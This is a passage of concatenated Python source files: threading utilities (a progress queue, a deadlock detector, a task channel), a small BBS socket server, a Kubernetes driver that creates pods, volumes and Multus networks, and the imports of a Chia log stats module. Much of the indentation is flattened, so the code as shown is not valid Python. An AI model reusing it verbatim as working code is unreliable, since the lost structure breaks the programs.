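# Example usage (sketch): a two-column display updated from worker threads.
# update_item() may be called from any thread; print_update() must only be
# called from the primary thread, which drains the queued updates.
#
#   progress = Progress([('done', 0), ('total', 0)])
#   progress.update_item('queued item', total=1)    # worker thread
#   progress.update_item('finished item', done=1)   # worker thread
#   progress.print_update()                         # primary thread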
class QueueWithProgress(queue.PriorityQueue):
"""Implements progress support in join()."""
def __init__(self, progress, *args, **kwargs):
queue.PriorityQueue.__init__(self, *args, **kwargs)
self.progress = progress
def task_done(self):
"""Contrary to Queue.task_done(), it wakes self.all_tasks_done at each task
done.
"""
with self.all_tasks_done:
try:
unfinished = self.unfinished_tasks - 1
if unfinished < 0:
raise ValueError('task_done() called too many times')
self.unfinished_tasks = unfinished
# This is less efficient, because we want the Progress to be updated.
self.all_tasks_done.notify_all()
except Exception as e:
logging.exception('task_done threw an exception.\n%s', e)
def wake_up(self):
"""Wakes up all_tasks_done.
    Unlike task_done(), do not subtract one from self.unfinished_tasks.
"""
    # TODO(maruel): This is highly inefficient, since the listener is woken
    # twice; once per output, once per task. There should be no relationship
    # between the number of outputs and the number of input tasks.
with self.all_tasks_done:
self.all_tasks_done.notify_all()
def join(self):
"""Calls print_update() whenever possible."""
self.progress.print_update()
with self.all_tasks_done:
while self.unfinished_tasks:
self.progress.print_update()
# Use a short wait timeout so updates are printed in a timely manner.
# TODO(maruel): Find a way so Progress.queue and self.all_tasks_done
# share the same underlying event so no polling is necessary.
self.all_tasks_done.wait(0.1)
self.progress.print_update()
class ThreadPoolWithProgress(ThreadPool):
QUEUE_CLASS = QueueWithProgress
def __init__(self, progress, *args, **kwargs):
self.QUEUE_CLASS = functools.partial(self.QUEUE_CLASS, progress)
super(ThreadPoolWithProgress, self).__init__(*args, **kwargs)
def _output_append(self, out):
"""Also wakes up the listener on new completed test_case."""
super(ThreadPoolWithProgress, self)._output_append(out)
self.tasks.wake_up()
def _on_iter_results_step(self):
self.tasks.progress.print_update()
class DeadlockDetector:
"""Context manager that can detect deadlocks.
It will dump stack frames of all running threads if its 'ping' method isn't
called in time.
Usage:
with DeadlockDetector(timeout=60) as detector:
for item in some_work():
...
detector.ping()
...
Arguments:
timeout - maximum allowed time between calls to 'ping'.
"""
def __init__(self, timeout):
self.timeout = timeout
self._thread = None
# Thread stop condition. Also lock for shared variables below.
self._stop_cv = threading.Condition()
self._stop_flag = False
# Time when 'ping' was called last time.
self._last_ping = None
# True if pings are coming on time.
self._alive = True
def __enter__(self):
"""Starts internal watcher thread."""
assert self._thread is None
self.ping()
self._thread = threading.Thread(name='deadlock-detector', target=self._run)
self._thread.daemon = True
self._thread.start()
return self
def __exit__(self, *_args):
"""Stops internal watcher thread."""
assert self._thread is not None
with self._stop_cv:
self._stop_flag = True
self._stop_cv.notify()
self._thread.join()
self._thread = None
self._stop_flag = False
def ping(self):
"""Notify detector that main thread is still running.
Should be called periodically to inform the detector that everything is
running as it should.
"""
with self._stop_cv:
self._last_ping = time.time()
self._alive = True
def _run(self):
"""Loop that watches for pings and dumps threads state if ping is late."""
with self._stop_cv:
while not self._stop_flag:
# Skipped deadline? Dump threads and switch to 'not alive' state.
if self._alive and time.time() > self._last_ping + self.timeout:
self.dump_threads(time.time() - self._last_ping, True)
self._alive = False
# Pings are on time?
if self._alive:
# Wait until the moment we need to dump stack traces.
# Most probably some other thread will call 'ping' to move deadline
# further in time. We don't bother to wake up after each 'ping',
# only right before initial expected deadline.
self._stop_cv.wait(self._last_ping + self.timeout - time.time())
else:
# Skipped some pings previously. Just periodically silently check
# for new pings with some arbitrary frequency.
self._stop_cv.wait(self.timeout * 0.1)
@staticmethod
def dump_threads(timeout=None, skip_current_thread=False):
"""Dumps stack frames of all running threads."""
all_threads = threading.enumerate()
current_thread_id = threading.current_thread().ident
# Collect tracebacks: thread name -> traceback string.
tracebacks = {}
# pylint: disable=W0212
for thread_id, frame in sys._current_frames().items():
# Don't dump deadlock detector's own thread, it's boring.
if thread_id == current_thread_id and skip_current_thread:
continue
# Try to get more informative symbolic thread name.
name = 'untitled'
for thread in all_threads:
if thread.ident == thread_id:
name = thread.name
break
name += ' #%d' % (thread_id,)
tracebacks[name] = ''.join(traceback.format_stack(frame))
# Function to print a message. Makes it easier to change output destination.
def output(msg):
logging.warning(msg.rstrip())
# Print tracebacks, sorting them by thread name. That way a thread pool's
# threads will be printed as one group.
output('=============== Potential deadlock detected ===============')
if timeout is not None:
output('No pings in last %d sec.' % (timeout,))
output('Dumping stack frames for all threads:')
for name in sorted(tracebacks):
output('Traceback for \'%s\':\n%s' % (name, tracebacks[name]))
output('===========================================================')
class TaskChannel:
"""Queue of results of async task execution."""
class Timeout(Exception):
"""Raised by 'pull' in case of timeout."""
_ITEM_RESULT = object()
_ITEM_EXCEPTION = object()
_ITEM_DONE = object()
def __init__(self):
self._queue = queue.Queue()
def send_result(self, result):
"""Enqueues a result of task execution."""
self._queue.put((self._ITEM_RESULT, result))
def send_done(self):
"""Stops the iteration."""
self._queue.put((self._ITEM_DONE, None))
def send_exception(self, exc_info=None):
"""Enqueue an exception raised by a task.
Arguments:
exc_info: If given, should be 3-tuple returned by sys.exc_info(),
default is current value of sys.exc_info(). Use default in
'except' blocks to capture currently processed exception.
"""
exc_info = exc_info or sys.exc_info()
assert isinstance(exc_info, tuple) and len(exc_info) == 3
# Transparently passing Timeout will break 'pull' contract, since a caller
# has no way to figure out that's an exception from the task and not from
# 'pull' itself. Transform Timeout into generic RuntimeError with
# explanation.
if isinstance(exc_info[1], TaskChannel.Timeout):
exc_info = (
RuntimeError,
RuntimeError('Task raised Timeout exception'),
exc_info[2])
self._queue.put((self._ITEM_EXCEPTION, exc_info))
def __iter__(self):
return self
def next(self, timeout=None):
"""Dequeues available result or exception.
Args:
timeout: if not None will block no longer than |timeout| seconds and will
raise TaskChannel.Timeout exception if no results are available.
Returns:
Whatever task pushes to the queue by calling 'send_result'.
Raises:
TaskChannel.Timeout: waiting longer than |timeout|.
Whatever exception task raises.
"""
# Do not ever use timeout == None, in that case signal handlers are not
# being called (at least on Python 2.7, http://bugs.python.org/issue8844).
while True:
try:
item_type, value = self._queue.get(
timeout=timeout if timeout is not None else 30.0)
break
except queue.Empty:
if timeout is None:
continue
raise TaskChannel.Timeout()
if item_type == self._ITEM_RESULT:
return value
if item_type == self._ITEM_EXCEPTION:
# 'value' is captured sys.exc_info() 3-tuple. Use extended raise syntax
# to preserve stack frame of original exception (that was raised in
# another thread).
assert isinstance(value, tuple) and len(value) == 3
raise value[1]
if item_type == self._ITEM_DONE:
raise StopIteration()
assert False, 'Impossible queue item type: %r' % item_type
def __next__(self):
# For python3 compatibility
return self.next()
def wrap_task(self, task):
"""Decorator that makes a function push results into this channel."""
@functools.wraps(task)
def wrapped(*args, **kwargs):
try:
self.send_result(task(*args, **kwargs))
except Exception:
self.send_exception()
return wrapped
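# Example usage (sketch): run a task on a worker thread and consume its result
# on the calling thread; an exception raised by the task is re-raised by next().
#
#   channel = TaskChannel()
#   threading.Thread(target=channel.wrap_task(compute), args=(42,)).start()
#   value = channel.next(timeout=60)  # raises TaskChannel.Timeout if too slow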
def num_processors():
"""Returns the number of processors.
Python on OSX 10.6 raises a NotImplementedError exception.
"""
try:
# Multiprocessing
import multiprocessing
return multiprocessing.cpu_count()
except: # pylint: disable=W0702
try:
# Mac OS 10.6
return int(os.sysconf('SC_NPROCESSORS_ONLN')) # pylint: disable=E1101
except:
# Some of the windows builders seem to get here.
return 4
|
socketMethod.py
|
#-*- coding:utf-8 -*-
import time, threading
from SocketServer import TCPServer, BaseRequestHandler
import traceback
from PythonSocketBBS import SocketServerBBS
def loop(a):
print 'thread is running...'
    # Brief pause before entering the blocking serve loop.
    time.sleep(1)
    a.serve_forever()
print 'thread ended.'
def socketMethod():
print 'Method is running...'
hostname=""
port=9996
print port
a=SocketServerBBS.PythonChatServer((hostname,port),SocketServerBBS.RequestHandler)
t = threading.Thread(target=loop,args=(a,))
t.start()
    # Poll once per second for a shutdown request from the BBS module.
    while True:
time.sleep(1)
b=SocketServerBBS.Sclose()
print b
print (1==b)
if (1==b):
print 'close'
a.shutdown()
a.server_close()
break
# t.join()
print 'Method ended.'
if __name__ == "__main__":
socketMethod()
|
environment.py
|
import uuid, yaml, json, sys, threading, logging
from threading import Thread
from kubernetes import client, config, watch
from kubernetes.client.rest import ApiException as K8sApiException
from kubernetes.client import V1DeleteOptions
from ignition.model.failure import FailureDetails, FAILURE_CODE_INTERNAL_ERROR, FAILURE_CODE_INFRASTRUCTURE_ERROR, FAILURE_CODE_UNKNOWN, FAILURE_CODE_RESOURCE_NOT_FOUND, FAILURE_CODE_RESOURCE_ALREADY_EXISTS
from ignition.service.framework import Service, Capability, interface
from ignition.service.logging import logging_context, LM_HTTP_HEADER_PREFIX, LM_HTTP_HEADER_TXNID, LM_HTTP_HEADER_PROCESS_ID
from ignition.model.infrastructure import STATUS_IN_PROGRESS, STATUS_UNKNOWN, STATUS_FAILED, STATUS_COMPLETE, InfrastructureTask, CreateInfrastructureResponse
from ignition.api.exceptions import ApiException
from k8svimdriver.k8s.cache import DeploymentLocationCache
from k8svimdriver.model.kubeconfig import KubeConfig
logger = logging.getLogger(__name__)
K8S_SERVER_PROP = 'k8s-server'
K8S_USERNAME = 'k8s-username'
K8S_CERT_AUTH_DATA_PROP = 'k8s-certificate-authority-data'
K8S_CLIENT_CERT_DATA_PROP = 'k8s-client-certificate-data'
K8S_CLIENT_KEY_DATA_PROP = 'k8s-client-key-data'
K8S_TOKEN_PROP = 'k8s-token'
K8S_NAMESPACE = "k8s-namespace"
REGISTRY_URI_PROP = 'registry_uri'
class InvalidDeploymentLocationException(ApiException):
status_code = 400
class K8sDeploymentLocation():
def __init__(self, deployment_location, k8s_properties, inf_messaging_service):
self.k8s_properties = k8s_properties
self.inf_messaging_service = inf_messaging_service
logger.debug('deployment location=' + str(deployment_location))
self.__name = deployment_location.get('name')
if self.__name is None:
raise InvalidDeploymentLocationException('Deployment Location managed by the K8s VIM Driver must have a name')
dl_properties = deployment_location.get('properties', {})
if dl_properties is None:
raise InvalidDeploymentLocationException('Deployment Location properties are missing')
k8sNamespace = dl_properties.get(K8S_NAMESPACE, None)
if k8sNamespace is None or k8sNamespace == '':
raise InvalidDeploymentLocationException('Deployment Location managed by the K8s VIM Driver must specify a property value for \'{0}\''.format(K8S_NAMESPACE))
self.__k8sNamespace = k8sNamespace
k8sServer = dl_properties.get(K8S_SERVER_PROP, None)
if k8sServer is None or k8sServer == '':
raise InvalidDeploymentLocationException('Deployment Location managed by the K8s VIM Driver must specify a property value for \'{0}\''.format(K8S_SERVER_PROP))
self.__k8sServer = k8sServer
self.kubeconfig_file = self.createKubeConfig(deployment_location)
self.k8s_client = config.new_client_from_config(config_file=self.kubeconfig_file)
self.watcher = watch.Watch()
self.init_pod_watcher()
def createKubeConfig(self, deployment_location):
dl_properties = deployment_location['properties']
return KubeConfig(self.k8s_properties.tmpdir, deployment_location['name'], dl_properties[K8S_SERVER_PROP], dl_properties.get(K8S_TOKEN_PROP, None), dl_properties.get(K8S_CERT_AUTH_DATA_PROP, None), dl_properties.get(K8S_CLIENT_CERT_DATA_PROP, None), dl_properties.get(K8S_CLIENT_KEY_DATA_PROP, None)).write()
def init_pod_watcher(self):
self.pod_watcher = threading.Thread(target=self.pod_watcher_worker, args=())
        self.pod_watcher.daemon = True
self.pod_watcher.start()
def pod_watcher_worker(self):
try:
logger.info('Monitoring pods')
# TODO loop until close condition is set
while True:
last_seen_version = 0
# poll forever (timeout == 0)
for pod_event in self.watcher.stream(self.coreV1Api().list_pod_for_all_namespaces, resource_version=last_seen_version, timeout_seconds=0):
event_type = pod_event['type']
pod = pod_event['object']
metadata = pod.metadata
if last_seen_version == 0:
# track where we are up to in the pod events stream in case we have to restart
last_seen_version = metadata.resource_version
pod_name = metadata.name
labels = metadata.labels
infrastructure_id = labels.get('infrastructure_id', None)
if infrastructure_id is not None:
logging_context.set_from_dict(labels)
try:
logger.debug('Got pod event {0}'.format(pod_event))
outputs = {}
phase = pod.status.phase
podStatus = self.__build_pod_status(event_type, pod, outputs)
request_type = 'CREATE'
failure_details = None
outputs = {
"host": pod.metadata.name
}
if phase is None:
status = STATUS_UNKNOWN
elif phase in ['Pending']:
container_statuses = pod.status.container_statuses
if container_statuses is not None and len(container_statuses) > 0:
waiting = container_statuses[0].state.waiting
if(waiting is not None):
if(waiting.reason in ['ErrImagePull', 'ImagePullBackOff']):
status = STATUS_FAILED
failure_details = FailureDetails(FAILURE_CODE_INFRASTRUCTURE_ERROR, 'ErrImagePull')
else:
status = STATUS_IN_PROGRESS
else:
status = STATUS_IN_PROGRESS
else:
status = STATUS_IN_PROGRESS
elif phase in ['Running']:
status = STATUS_COMPLETE
elif phase in ['Failed']:
                                status = STATUS_FAILED
                                failure_details = FailureDetails(FAILURE_CODE_INFRASTRUCTURE_ERROR, podStatus['status_reason'])
else:
status = STATUS_UNKNOWN
if status in [STATUS_COMPLETE, STATUS_FAILED]:
if status == STATUS_COMPLETE:
try:
# try to find the ConfigMap that contains information on output property mappings
cm = self.coreV1Api().read_namespaced_config_map(infrastructure_id, self.namespace())
logger.info("Got ConfigMap {0} for infrastructure_id {1}".format(str(cm), infrastructure_id))
if cm is not None:
for output_prop_name, k8s_key in cm.data.items():
logger.info("Output: {0}={1}".format(output_prop_name, k8s_key))
if k8s_key.startswith('network.'):
k8s_prop_name = k8s_key[len('network.'):]
logger.info("k8s_prop_name: {0}".format(k8s_prop_name))
annotations = pod.metadata.annotations
networks_status_str = annotations.get('k8s.v1.cni.cncf.io/networks-status', None)
logger.info('networks_status_str: {0}'.format(str(networks_status_str)))
if networks_status_str is not None:
networks_status = json.loads(networks_status_str)
for network_status in networks_status:
net_name = network_status.get('name', None)
net_ips = network_status.get('ips', {})
logger.info('net_name {0}, net_ips {1}'.format(net_name, str(net_ips)))
if net_name is not None and len(net_ips) > 0:
if net_name == k8s_prop_name:
outputs[output_prop_name] = net_ips[0]
else:
logger.info('network status not found for output property {0}'.format(output_prop_name))
                                    except K8sApiException as e:
                                        # A 404 simply means no output-mapping ConfigMap was defined.
                                        if e.status == 404:
                                            logger.info("Unable to find cm for infrastructure id {0}".format(infrastructure_id))
inf_task = InfrastructureTask(infrastructure_id, infrastructure_id, status, failure_details, outputs)
logger.info('Sending infrastructure response {0}'.format(str(inf_task)))
self.inf_messaging_service.send_infrastructure_task(inf_task)
finally:
logging_context.clear()
except Exception:
logger.exception("Unexpected exception watching pods, re-initializing")
self.pod_watcher_worker()
def storage_watcher_worker(self):
logger.debug('Monitoring storage')
for item in self.watcher.stream(self.coreV1Api().list_persistent_volume, timeout_seconds=0):
storage = item['object']
logger.debug('storage event {0}'.format(item))
def namespace(self):
return self.__k8sNamespace
def coreV1Api(self):
return client.CoreV1Api(self.k8s_client)
def customApi(self):
return client.CustomObjectsApi(self.k8s_client)
def create_infrastructure_impl(self, infrastructure_id, k8s):
try:
logger.info('storage=' + str(k8s.get('storage')))
for storage_name, storage in k8s.get('storage', {}).items():
storageSize = storage.get('size', None)
storageClassName = storage.get('storageClassName', None)
properties = {
}
if storageClassName == "hostpath":
properties['hostpath'] = storage.get('hostpath', None)
self.create_storage(storage_name, storageSize, storageClassName, infrastructure_id, properties)
for _, network in k8s.get('networks', {}).items():
network_name = network.get('name', None)
bridge = network.get('bridge', None)
subnet = network.get('subnet', None)
range_start = network.get('range_start', None)
range_end = network.get('range_end', None)
self.create_network(infrastructure_id, network_name, bridge, subnet, range_start, range_end)
# TODO mapping storageClassName to pods - just have one storage class?
for pod in k8s.get('pods', []):
pod_name = pod.get('name', None)
image = pod.get('image', None)
container_port = pod.get('container_port', None)
# storage_name, storageClassName, storageSize
storage = pod.get('storage', [])
networks = pod.get('network', [])
logger.info('pod_name=' + pod_name)
self.create_pod(pod_name, image, container_port, infrastructure_id, storage, networks)
self.create_config_map_for_outputs(pod_name, infrastructure_id, k8s.get('outputs', {}))
except K8sApiException as e:
if e.status == 409:
                logger.error('K8s conflict exception: ' + str(e))
self.inf_messaging_service.send_infrastructure_task(InfrastructureTask(infrastructure_id, infrastructure_id, STATUS_FAILED, FailureDetails(FAILURE_CODE_RESOURCE_ALREADY_EXISTS, "Resource already exists"), {}))
else:
                logger.error('K8s API exception: ' + str(e))
self.inf_messaging_service.send_infrastructure_task(InfrastructureTask(infrastructure_id, infrastructure_id, STATUS_FAILED, FailureDetails(FAILURE_CODE_INTERNAL_ERROR, str(e)), {}))
except Exception as e:
            logger.error('Unexpected exception: ' + str(e))
self.inf_messaging_service.send_infrastructure_task(InfrastructureTask(infrastructure_id, infrastructure_id, STATUS_FAILED, FailureDetails(FAILURE_CODE_INTERNAL_ERROR, str(e)), {}))
def create_infrastructure(self, infrastructure_id, k8s):
# Run in a thread so the driver can respond ASAP
# TODO use Ignition job queue to queue these requests up
worker = Thread(target=self.create_infrastructure_impl, args=(infrastructure_id, k8s,))
# force the driver to wait for any create infrastructure threads to finish before exiting
        worker.daemon = False
worker.start()
return CreateInfrastructureResponse(infrastructure_id, infrastructure_id)
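    # Illustrative shape of the `k8s` payload consumed by
    # create_infrastructure_impl above (keys inferred from its accessors;
    # the concrete values here are made-up placeholders):
    #
    #   k8s = {
    #       'storage': {'data-vol': {'size': '1Gi',
    #                                'storageClassName': 'hostpath',
    #                                'hostpath': '/mnt/data'}},
    #       'networks': {'net1': {'name': 'mgmt-net', 'bridge': 'br0',
    #                             'subnet': '10.10.0.0/24',
    #                             'range_start': '10.10.0.10',
    #                             'range_end': '10.10.0.100'}},
    #       'pods': [{'name': 'my-pod', 'image': 'nginx:stable',
    #                 'container_port': 80,
    #                 'storage': [{'name': 'data-vol', 'size': '1Gi',
    #                              'storageClassName': 'hostpath',
    #                              'mountPath': '/data'}],
    #                 'network': [{'name': 'mgmt-net'}]}],
    #       'outputs': {'mgmt_ip': 'network.mgmt-net'}
    #   }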
def create_config_map_for_outputs(self, pod_name, infrastructure_id, outputs):
logger.info("output = {0}".format(str(outputs)))
logger.info("output type = {0}".format(str(type(outputs))))
api_response = self.coreV1Api().create_namespaced_config_map(namespace=self.namespace(), body=client.V1ConfigMap(api_version="v1",
kind="ConfigMap",
metadata=client.V1ObjectMeta(
namespace=self.namespace(),
name=infrastructure_id,
labels={"infrastructure_id": infrastructure_id}),
data=outputs)
)
# TODO handle api_response
logger.info("Config Map created. status='%s'" % str(api_response))
def normalize_name(self, name):
return name.replace("_", "-")
def create_pod_object(self, podName, image, container_port, infrastructure_id, storage, networks):
# Configure Pod template container
ports = []
if(container_port is not None):
ports.append(client.V1ContainerPort(name="http", container_port=container_port, protocol="TCP"))
volumes = []
volumeMounts = []
for s in storage:
volumes.append(client.V1Volume(
name=self.normalize_name(s["name"]),
persistent_volume_claim=client.V1PersistentVolumeClaimVolumeSource(
claim_name=self.normalize_name(s["name"])
)
))
volumeMounts.append(client.V1VolumeMount(
name=self.normalize_name(s["name"]),
mount_path=s["mountPath"]
# other optional arguments, see the volume mount doc link below
))
container = client.V1Container(
name=podName,
image=image,
image_pull_policy="IfNotPresent",
ports=ports,
volume_mounts=volumeMounts)
networks_as_string = ', '.join(list(map(lambda network: network['name'], networks)))
logger.info('pod networks: ' + str(networks_as_string))
spec = client.V1PodSpec(
containers=[container],
volumes=volumes)
return client.V1Pod(
api_version="v1",
kind="Pod",
metadata=client.V1ObjectMeta(name=podName, labels={
"infrastructure_id": infrastructure_id,
LM_HTTP_HEADER_TXNID: logging_context.get(LM_HTTP_HEADER_TXNID, ""),
LM_HTTP_HEADER_PROCESS_ID: logging_context.get(LM_HTTP_HEADER_PROCESS_ID, "")
},
annotations={
"k8s.v1.cni.cncf.io/networks": networks_as_string,
}),
spec=spec)
def create_network(self, infrastructure_id, name, bridge, subnet, range_start, range_end):
logger.info("Creating network {0} {1} {2} {3} {4} {5}".format(infrastructure_id, name, bridge, subnet, range_start, range_end))
# we support Multus networks only at present
config = {
"name": name,
"type": "bridge",
"bridge": bridge,
"isDefaultGateway": True,
"forceAddress": False,
"ipMasq": True,
"hairpinMode": True,
"ipam": {
"type": "host-local",
"subnet": subnet,
"rangeStart": range_start,
"rangeEnd": range_end
}
}
body = {
"apiVersion": "k8s.cni.cncf.io/v1",
"kind": "NetworkAttachmentDefinition",
"metadata": {
"name": name,
"labels": {
"infrastructure_id": infrastructure_id
}
},
"spec": {
"config": json.dumps(config)
}
}
logger.info('create network, body = {0}'.format(json.dumps(body)))
try:
self.customApi().create_namespaced_custom_object(group="k8s.cni.cncf.io", version="v1", namespace=self.namespace(), plural="network-attachment-definitions", body=body)
except K8sApiException as e:
if e.reason == 'Conflict':
# this is ok, assume the network already exists
pass
else:
raise
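    # For reference (a hand-written sketch, not driver output): the body built
    # above serialises to a NetworkAttachmentDefinition such as the following,
    # which Multus resolves via the k8s.v1.cni.cncf.io/networks pod annotation.
    # The names and addresses are illustrative only:
    #
    #   apiVersion: k8s.cni.cncf.io/v1
    #   kind: NetworkAttachmentDefinition
    #   metadata:
    #     name: mgmt-net
    #   spec:
    #     config: '{"name": "mgmt-net", "type": "bridge", "bridge": "br0",
    #               "ipam": {"type": "host-local", "subnet": "10.10.0.0/24",
    #                        "rangeStart": "10.10.0.10",
    #                        "rangeEnd": "10.10.0.100"}}'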
def create_pod(self, podName, image, container_port, infrastructure_id, storage, networks):
logger.info("pod storage="+str(storage))
for s in storage:
claimObject = client.V1PersistentVolumeClaim(
metadata=client.V1ObjectMeta(
namespace=self.namespace(),
name=self.normalize_name(s["name"]),
labels={"infrastructure_id": infrastructure_id}),
spec=client.V1PersistentVolumeClaimSpec(
access_modes=["ReadWriteOnce"],
resources=client.V1ResourceRequirements(
requests={
"storage": s["size"]
},
limits={
}
),
# TODO
storage_class_name=s["storageClassName"]
)
)
logger.info("Volume claim %s" % str(claimObject))
api_response = self.coreV1Api().create_namespaced_persistent_volume_claim(
body=claimObject,
namespace=self.namespace())
# TODO handle api_response
logger.info("Persistent volume claim created. status='%s'" % str(api_response.status))
logger.info('Creating pod object')
pod = self.create_pod_object(podName, image, container_port, infrastructure_id, storage, networks)
logger.info("Namespace = " + self.namespace())
logger.info("Creating pod %s" % str(pod))
# Create pod
api_response = self.coreV1Api().create_namespaced_pod(
body=pod,
namespace=self.namespace())
logger.info("Pod created. status='%s'" % str(api_response.status))
return api_response
def __build_pod_status(self, request_type, pod, outputs):
phase = pod.status.phase
status_reason = None
status = STATUS_UNKNOWN
# if request_type == 'CREATE':
if(phase is None):
status = STATUS_UNKNOWN
elif(phase in ['Pending']):
container_statuses = pod.status.container_statuses
if container_statuses is not None and len(container_statuses) > 0:
waiting = container_statuses[0].state.waiting
if(waiting is not None):
if(waiting.reason == 'ErrImagePull'):
status = STATUS_FAILED
status_reason = 'ErrImagePull'
else:
status = STATUS_IN_PROGRESS
else:
status = STATUS_IN_PROGRESS
else:
status = STATUS_IN_PROGRESS
elif(phase in ['Running']):
status = STATUS_COMPLETE
elif(phase in ['Failed']):
status = STATUS_FAILED
else:
status = STATUS_UNKNOWN
return {
'status': status,
'status_reason': status_reason
}
def __build_pvc_status(self, request_type, pvc, outputs):
phase = pvc.status.phase
status_reason = None
status = STATUS_UNKNOWN
logger.debug('__build_pvc_status {0} {1}'.format(request_type, pvc))
if(phase is None):
status = STATUS_UNKNOWN
elif(phase == 'Failed'):
status = STATUS_FAILED
elif(phase == 'Bound'):
status = STATUS_COMPLETE
elif(phase == 'Available'):
# TODO check this
status = STATUS_IN_PROGRESS
else:
status = STATUS_UNKNOWN
return {
'status': status,
'status_reason': status_reason
}
def get_infrastructure(self, infrastructure_id, request_type):
outputs = {}
statuses = []
        # Use extend (not append) so `statuses` is a flat list of status dicts,
        # and iterate over .items of the k8s list responses.
        statuses.extend(map(lambda pod: self.__build_pod_status(request_type, pod, outputs), self.coreV1Api().list_namespaced_pod(namespace=self.namespace(), label_selector='infrastructure_id={}'.format(infrastructure_id)).items))
        statuses.extend(map(lambda pvc: self.__build_pvc_status(request_type, pvc, outputs), self.coreV1Api().list_namespaced_persistent_volume_claim(namespace=self.namespace(), label_selector='infrastructure_id={}'.format(infrastructure_id)).items))
failure_details = None
status = STATUS_COMPLETE
if request_type == 'CREATE':
failed = list(filter(lambda x: x['status'] == STATUS_FAILED, statuses))
if len(failed) > 0:
status = STATUS_FAILED
                failure_details = FailureDetails(FAILURE_CODE_INFRASTRUCTURE_ERROR, failed[0]['status_reason'])
in_progress = list(filter(lambda x: x['status'] == STATUS_IN_PROGRESS, statuses))
if len(in_progress) > 0:
status = STATUS_IN_PROGRESS
return InfrastructureTask(infrastructure_id, infrastructure_id, status, failure_details, outputs)
elif request_type == 'DELETE':
failed = list(filter(lambda x: x['status'] == STATUS_FAILED, statuses))
in_progress = list(filter(lambda x: x['status'] == STATUS_IN_PROGRESS, statuses))
if len(failed) > 0:
status = STATUS_FAILED
                failure_details = FailureDetails(FAILURE_CODE_INFRASTRUCTURE_ERROR, failed[0]['status_reason'])
elif len(in_progress) > 0 or len(statuses) > 0:
status = STATUS_IN_PROGRESS
return InfrastructureTask(infrastructure_id, infrastructure_id, status, failure_details, outputs)
else:
raise ValueError("Invalud request_type {0}".format(request_type))
def delete_infrastructure(self, infrastructure_id):
self.delete_pod_with_infrastructure_id(infrastructure_id)
self.delete_storage_with_infrastructure_id(infrastructure_id)
self.delete_networks_with_infrastructure_id(infrastructure_id)
def delete_pod_with_infrastructure_id(self, infrastructure_id):
v1 = self.coreV1Api()
pod_list = v1.list_namespaced_pod(namespace=self.namespace(), label_selector='infrastructure_id={}'.format(infrastructure_id))
logger.info('delete_pod_with_infrastructure_id {0}'.format(str(pod_list)))
if(len(pod_list.items)) > 0:
name = pod_list.items[0].metadata.name
logger.info('Deleting pod with name {0} in namespace {1}'.format(name, self.namespace()))
v1.delete_namespaced_pod(namespace=self.namespace(), name=name)
def delete_pod(self, name):
api_response = self.coreV1Api().delete_namespaced_pod(namespace=self.namespace(), name=name)
    # capacity: a Kubernetes quantity string, e.g. '1Gi'
def create_storage(self, name, capacity, storageClassName, infrastructure_id, properties):
v1 = self.coreV1Api()
logger.debug('storageClassName=' + storageClassName)
if(storageClassName == 'hostpath'):
hostpath = properties.get('hostpath', None)
if(hostpath is None):
raise ValueError("Hostpath property must be provided")
spec=client.V1PersistentVolumeSpec(
capacity={'storage': capacity},
access_modes=['ReadWriteOnce'],
host_path=client.V1HostPathVolumeSource(
path=hostpath,
type=''
))
storage = client.V1PersistentVolume(
api_version='v1',
kind='PersistentVolume',
metadata=client.V1ObjectMeta(name=name, labels={"infrastructure_id": infrastructure_id}),
spec=spec)
logger.debug("Creating storage %s" % str(storage))
api_response = v1.create_persistent_volume(storage)
logger.debug("Storage created. status='%s'" % str(api_response.status))
else:
# the storage provisioner will create the persistent volume in this case
pass
def get_storage(self, infrastructure_id):
v1 = self.coreV1Api()
storage_list = v1.list_persistent_volume(label_selector='infrastructure_id={}'.format(infrastructure_id))
if(len(storage_list.items)) > 0:
name = storage_list.items[0].metadata.name
return v1.read_persistent_volume(name=name)
else:
return None
def delete_networks_with_infrastructure_id(self, infrastructure_id):
customApi = self.customApi()
network_list = customApi.list_namespaced_custom_object(group="k8s.cni.cncf.io", version="v1", namespace=self.namespace(), plural="network-attachment-definitions", label_selector='infrastructure_id={}'.format(infrastructure_id), watch=False)
for network in network_list['items']:
            logger.info('Deleting network={0}'.format(str(network)))
# TODO handle errors
api_response = customApi.delete_namespaced_custom_object(group="k8s.cni.cncf.io", version="v1", namespace=self.namespace(), plural="network-attachment-definitions", name=network['metadata']['name'], body=V1DeleteOptions())
def delete_storage_with_infrastructure_id(self, infrastructure_id):
v1 = self.coreV1Api()
storage_list = v1.list_namespaced_persistent_volume_claim(namespace=self.namespace(), label_selector='infrastructure_id={}'.format(infrastructure_id))
for storage in storage_list.items:
# TODO handle errors
api_response = v1.delete_namespaced_persistent_volume_claim(namespace=self.namespace(), name=storage.metadata.name)
def delete_storage(self, name):
api_response = self.coreV1Api().delete_persistent_volume(name=name)
class DeploymentLocationTranslatorCapability(Capability):
@interface
def from_deployment_location(self, deployment_location):
pass
class K8sDeploymentLocationTranslator(Service, DeploymentLocationTranslatorCapability):
def __init__(self, k8s_properties, **kwargs):
self.dl_cache = DeploymentLocationCache()
self.k8s_properties = k8s_properties
if 'inf_messaging_service' not in kwargs:
raise ValueError('inf_messaging_service argument not provided')
self.inf_messaging_service = kwargs.get('inf_messaging_service')
def from_deployment_location(self, deployment_location):
dl_name = deployment_location.get('name', None)
if dl_name is None:
raise ValueError('Deployment Location managed by the K8s VIM Driver must have a name')
dl = self.dl_cache.get(dl_name)
if dl is None:
dl = K8sDeploymentLocation(deployment_location, self.k8s_properties, self.inf_messaging_service)
self.dl_cache.put(dl_name, dl)
return dl
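    # Illustrative deployment location payload (property keys come from the
    # K8S_* constants above; the values are placeholders):
    #
    #   translator.from_deployment_location({
    #       'name': 'my-k8s-dl',
    #       'properties': {
    #           'k8s-server': 'https://k8s.example.local:6443',
    #           'k8s-namespace': 'default',
    #           'k8s-token': '<service-account-token>',
    #       }
    #   })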
|
stats_manager.py
|
# std
import logging
import os
from datetime import datetime, timedelta
from typing import List
from threading import Thread
from time import sleep
# project
from . import HarvesterActivityConsumer, FinishedSignageConsumer
from .stat_accumulators.eligible_plots_stats import EligiblePlotsStats
from .stat_accumulators.search_time_stats import SearchTimeStats
from .stat_accumulators.signage_point_stats import SignagePointStats
from .stat_accumulators.found_proof_stats import FoundProofStats
from .stat_accumulators.number_plots_stats import NumberPlotsStats
from src.chia_log.parsers.harvester_activity_parser import HarvesterActivityMessage
from src.chia_log.parsers.finished_signage_point_parser import FinishedSignagePointMessage
from src.notifier.notify_manager import NotifyManager
